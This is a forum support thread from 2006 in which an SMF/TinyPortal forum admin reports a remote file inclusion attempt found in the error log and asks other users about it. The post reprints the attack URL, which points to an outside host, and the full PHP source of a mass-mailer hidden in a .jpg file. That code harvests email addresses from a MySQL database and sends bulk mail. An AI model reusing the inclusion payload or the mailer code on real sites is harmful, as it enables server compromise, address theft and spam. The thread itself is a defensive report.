Hi folks,
while parsing the errormessages of my forum i found the following :
Filter hinzufügen: Zeige nur Fehlermeldungen dieses Benutzers Gast Gestern um 01:33:13
Filter hinzufügen: Zeige nur Fehlermeldungen dieser URL http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?
Filter hinzufügen: Zeige nur Fehlermeldungen mit der gleichen Nachricht
Datenbankfehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://ibank.glwb.info/mayer.jpg? AND off=0 AND approved=1 LIMIT 1' at line 1
Datei: /var/www/rad-community/htdocs/ds1test/Sources/TPortal.php
Zeile: 368
i was wondering what the guest want to do so i checked the link and found the following code hidden in the mayer.jpg
<?
If ($action=="mysql"){
#Grab email addresses de MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");
mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");
$result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Mail:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload
Txt:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Plain
<input type="radio" name="contenttype" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Emails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Porfavor complete todo lo necesario.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
?>
<p align="center"><b>Hosted by XGnDX </b></p>
It seems to me that this is a try to get all the email adresses out the sql database to use them as spamadresses.
Does anybody knows this allready or is it completely new ?
PowerPyx
Well, what version of SMF do you have?
Version 1.1RC2 with TP 0.86, all latest security fixes installed
Sounds like someone trying to exploit something in TinyPortal - ask at Bloc's site?
Lainaus käyttäjältä: Grudge - toukokuu 08, 2006, 05:31:27 IP
Sounds like someone trying to exploit something in TinyPortal - ask at Bloc's site?
What Grudge said, but..
Lainaus käyttäjältä: PowerPyx - toukokuu 08, 2006, 06:09:57 AP
all latest security fixes installed
This means nothing, please list any and every security fix installed.
is it dangerous? :o